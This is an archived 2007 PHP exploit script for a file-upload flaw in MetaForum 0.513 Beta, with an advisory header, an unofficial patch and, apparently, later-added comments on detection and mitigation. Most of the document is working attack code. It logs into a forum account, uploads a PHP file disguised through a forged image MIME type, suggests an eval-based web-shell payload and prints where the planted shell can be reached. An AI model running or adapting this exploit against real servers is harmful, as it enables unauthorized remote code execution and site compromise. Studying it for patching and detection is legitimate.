seebugRootSSV:6424

MetaForum <= 0.513 Beta Remote File Upload Exploit

2007-03-1900:00:00


                                                <?php
/*---------------------------------------------------------*\\
MetaForum <= 0.513 Beta - Remote file upload Vulnerability

[|Description:|]
A security bug has been discovered in MetaForum 0.513 Beta.
This bug can be used by an attacker to upload a malicious php file on the server.
During the upload, the MIME type of the file is the only verified parameter. The extension isn't.
This enables an attacker to fake the MIME type of a php file so that it is considered as an image.

[|Advisory:|]
http://www.aeroxteam.fr/advisory-MetaForum-0.513b.txt

[|Solution:|] (unofficial)
Replace line 110 in the file usercp.php by:
if (($_FILES['imagefile']['type'] == "image/jpeg" || $_FILES['imagefile']['type'] == "image/pjpeg" || $_FILES['imagefile']['type'] == "image/png" || $_FILES['imagefile']['type'] == "image/gif") && in_array(strtolower(substr(strrchr($_FILES['imagefile']['name'], '.'),1)), array('gif', 'jpg', 'jpeg', 'png')))
Note that $_FILES['imagefile']['type'] is supplied by the client, so the extension allowlist is the only part of this check the server controls; validating the file content server-side and storing the upload under a server-generated name is the stronger fix.

C0d3d&nbsp;by&nbsp;Gu1ll4um3r0m41n&nbsp;(aeroxteam&nbsp;--[at]--&nbsp;gmail&nbsp;--[dot]--&nbsp;com)
for&nbsp;AeroX&nbsp;&&nbsp;NeoAlpha&nbsp;(AeroXteam.fr&nbsp;--&nbsp;Neoalpha.fr)
(C)opyleft&nbsp;2007
Gr33tz:&nbsp;Math.,&nbsp;Syntax&nbsp;ERROR,&nbsp;Barma,&nbsp;NeoMorphS,&nbsp;Snake91,&nbsp;Spamm,&nbsp;Kad,&nbsp;Nitr0,&nbsp;Jethro&nbsp;And&nbsp;everybody&nbsp;from&nbsp;#aerox
\\*---------------------------------------------------------*/
// CLI driver. Expects five positional arguments (host, base path, username, password,
// cookie prefix); $argv[0] is the script itself, hence the count of 6. Any other argument
// count falls through to usage().
if(count($argv)&nbsp;==&nbsp;6)&nbsp;{
	head();
	// The payload body is read from STDIN and sent verbatim as the "image" part below.
	echo&nbsp;\"PHP&nbsp;code&nbsp;to&nbsp;write&nbsp;(ex:&nbsp;<?php&nbsp;eval(stripslashes(\\$_GET[\'cmd\']));&nbsp;?>)&nbsp;:\\r\\n\";
	$phpcode&nbsp;=&nbsp;trim(fgets(STDIN));
	echo&nbsp;\"\\r\\n[+]&nbsp;Connection...&nbsp;\";
	// Step 1: plain HTTP on port 80 (no TLS) to log in and obtain the session cookie.
	$sock&nbsp;=&nbsp;@fsockopen($argv[1],&nbsp;80,&nbsp;$eno,&nbsp;$estr,&nbsp;30);
	if&nbsp;(!$sock)&nbsp;{
		die(\"Failed\\r\\n\\r\\nCould&nbsp;not&nbsp;connect&nbsp;to&nbsp;\".$argv[1].\"&nbsp;on&nbsp;the&nbsp;port&nbsp;80&nbsp;!\");
	}
	echo&nbsp;\"OK\\r\\n\";
	echo&nbsp;\"[+]&nbsp;Login&nbsp;to&nbsp;account...&nbsp;\";
	// Login is a form POST to index.php?shard=login&action=proc_login with
	// login_name / login_pass; a valid account on the forum is required.
	$reqlogin&nbsp;=&nbsp;\"POST&nbsp;\".$argv[2].\"index.php?shard=login&action=proc_login&nbsp;HTTP/1.1\\r\\n\";
	$reqlogin&nbsp;.=&nbsp;\"Host:&nbsp;\".$argv[1].\"\\r\\n\";
	$reqlogin&nbsp;.=&nbsp;\"Accept:&nbsp;*/*\\r\\n\";
	$reqlogin&nbsp;.=&nbsp;\"Connection:&nbsp;Close\\r\\n\";
	$reqlogin&nbsp;.=&nbsp;\"Content-Type:&nbsp;application/x-www-form-urlencoded\\r\\n\";
	$reqlogin&nbsp;.=&nbsp;\"Content-Length:&nbsp;\".strlen(\"login_name=\".$argv[3].\"&login_pass=\".$argv[4]).\"\\r\\n\\r\\n\";
	$reqlogin&nbsp;.=&nbsp;\"login_name=\".$argv[3].\"&login_pass=\".$argv[4];
	fwrite($sock,&nbsp;$reqlogin);
	// The response is scanned line by line for a Set-Cookie of "<prefix>userID=...";
	// that value is the session identifier reused in the upload request.
	while(!feof($sock))&nbsp;{
		$buffer&nbsp;=&nbsp;fgets($sock);
		if(preg_match(\"`Set-Cookie:&nbsp;\".$argv[5].\"userID=(.*?);`\",&nbsp;$buffer,&nbsp;$idtmp))&nbsp;{&nbsp;$id&nbsp;=&nbsp;$idtmp[1];&nbsp;}
	}
	if(empty($id))&nbsp;{
		die(\"Failed\\r\\n\\r\\nCould&nbsp;not&nbsp;login&nbsp;as&nbsp;\".$argv[3].\"&nbsp;!\");
	}&nbsp;else&nbsp;{
		echo&nbsp;\"OK\\r\\n\";
	}
	fclose($sock);

	echo&nbsp;\"[+]&nbsp;Sending&nbsp;of&nbsp;the&nbsp;file...&nbsp;\";
	// Step 2: the avatar upload, i.e. the vulnerable request
	// (index.php?shard=usercp&action=g_avatar). The multipart part below declares
	// filename="owned.php" together with a client-chosen Content-Type of image/jpeg,
	// which is the gap described in the header: only the MIME type is verified, not
	// the extension or the file content.
	// Detection: a POST to this action whose multipart filename ends in .php, or whose
	// declared image Content-Type does not match the payload bytes, followed by GET
	// requests for images/*.php; on disk, any .php file under the images directory.
	$sock&nbsp;=&nbsp;@fsockopen($argv[1],&nbsp;80,&nbsp;$eno,&nbsp;$estr,&nbsp;30);
	if&nbsp;(!$sock)&nbsp;{
		die(\"Failed\\r\\n\\r\\nCould&nbsp;not&nbsp;connect&nbsp;to&nbsp;\".$argv[1].\"&nbsp;on&nbsp;the&nbsp;port&nbsp;80&nbsp;!\");
	}
	$requp&nbsp;=&nbsp;\"POST&nbsp;\".$argv[2].\"index.php?shard=usercp&action=g_avatar&nbsp;HTTP/1.1\\r\\n\";
	$requp&nbsp;.=&nbsp;\"Host:&nbsp;\".$argv[1].\"\\r\\n\";
	$requp&nbsp;.=&nbsp;\"Accept:&nbsp;*/*\\r\\n\";
	$requp&nbsp;.=&nbsp;\"Connection:&nbsp;Close\\r\\n\";
	// Session cookies: "<prefix>username", the captured "<prefix>userID", and
	// "<prefix>password" set to sha1() of the password. This implies the forum keeps an
	// unsalted sha1 of the password in a cookie — worth confirming in its auth code, since
	// that would be a separate weakness from the upload bug.
	$requp&nbsp;.=&nbsp;\"Cookie:&nbsp;\".$argv[5].\"username=\".$argv[3].\";&nbsp;\".$argv[5].\"userID=\".$id.\";&nbsp;\".$argv[5].\"password=\".sha1($argv[4]).\"\\r\\n\";
	$requp&nbsp;.=&nbsp;\"Content-Type:&nbsp;multipart/form-data;&nbsp;boundary=--------------268742553814512\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"----------------268742553814512\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"Content-Disposition:&nbsp;form-data;&nbsp;name=\\\"upload_flag\\\";\\r\\n\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"true\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"----------------268742553814512\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"Content-Disposition:&nbsp;form-data;&nbsp;name=\\\"imagefile\\\";&nbsp;filename=\\\"owned.php\\\";\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"Content-Type:&nbsp;image/jpeg\\r\\n\\r\\n\";
	$requp2&nbsp;.=&nbsp;$phpcode.\"\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"----------------268742553814512\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"Content-Disposition:&nbsp;form-data;&nbsp;name=\\\"Submit\\\";\\r\\n\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"Submit\\r\\n\";
	$requp2&nbsp;.=&nbsp;\"----------------268742553814512--\\r\\n\";
	$requp&nbsp;.=&nbsp;\"Content-Length:&nbsp;\".strlen($requp2).\"\\r\\n\\r\\n\";
	$requp&nbsp;.=&nbsp;$requp2;
	fwrite($sock,&nbsp;$requp);
	// Success is inferred from the response echoing an <img> tag that points at
	// images/<username>.php. That suggests the server stores the avatar under the
	// account name while keeping the client-supplied extension — confirm against
	// usercp.php rather than relying on this heuristic.
	// Mitigation (application side): allowlist extensions server-side, validate the
	// image content (e.g. getimagesize()), store uploads under a server-generated name,
	// and serve the upload directory with script execution disabled.
	while(!feof($sock))&nbsp;{
		if(preg_match(\"`<img&nbsp;src=\'images/\".$argv[3].\".php\'`\",&nbsp;fgets($sock)))&nbsp;{&nbsp;$ok&nbsp;=&nbsp;1;&nbsp;}
	}
	if($ok&nbsp;==&nbsp;1)&nbsp;{
		echo&nbsp;\"OK\\r\\n\\r\\nYou&nbsp;can&nbsp;access&nbsp;the&nbsp;file&nbsp;at:\\r\\nhttp://\".$argv[1].$argv[2].\"images/\".$argv[3].\".php\\r\\n\\r\\nThank&nbsp;for&nbsp;using&nbsp;this&nbsp;exploit&nbsp;!\";
	}&nbsp;else&nbsp;{
		die(\"Failed\\r\\n\\r\\nMaybe&nbsp;not&nbsp;vulnerable&nbsp;?!\");
	}
}&nbsp;else&nbsp;{
	usage();
}
// Prints the usage banner. The five positional arguments it lists are what the
// top-level driver reads from $argv (host, base path, username, password, cookie prefix).
function&nbsp;usage()&nbsp;{
	echo&nbsp;\"+----------------------------------------------------------------+\\r\\n\";
	echo&nbsp;\"|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;MetaForum&nbsp;<=&nbsp;0.513_beta&nbsp;Remote&nbsp;file&nbsp;upload&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|\\r\\n\";
	echo&nbsp;\"|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;By&nbsp;Gu1ll4um3r0m41n&nbsp;for&nbsp;AeroX&nbsp;&&nbsp;NeoAlpha&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|\\r\\n\";
	echo&nbsp;\"|&nbsp;Usage:&nbsp;php&nbsp;exploit.php&nbsp;site.com&nbsp;/path/&nbsp;user&nbsp;pass&nbsp;cookie_prefix&nbsp;|\\r\\n\";
	echo&nbsp;\"+----------------------------------------------------------------+\\r\\n\";
}
// Prints the title banner shown at the start of a run; output only, no return value.
function&nbsp;head()&nbsp;{
	echo&nbsp;\"+----------------------------------------------+\\r\\n\";
	echo&nbsp;\"|&nbsp;&nbsp;MetaForum&nbsp;<=&nbsp;0.513_beta&nbsp;Remote&nbsp;file&nbsp;upload&nbsp;&nbsp;|\\r\\n\";
	echo&nbsp;\"|&nbsp;&nbsp;&nbsp;By&nbsp;Gu1ll4um3r0m41n&nbsp;for&nbsp;AeroX&nbsp;&&nbsp;NeoAlpha&nbsp;&nbsp;&nbsp;&nbsp;|\\r\\n\";
	echo&nbsp;\"+----------------------------------------------+\\r\\n\\r\\n\";
}
?>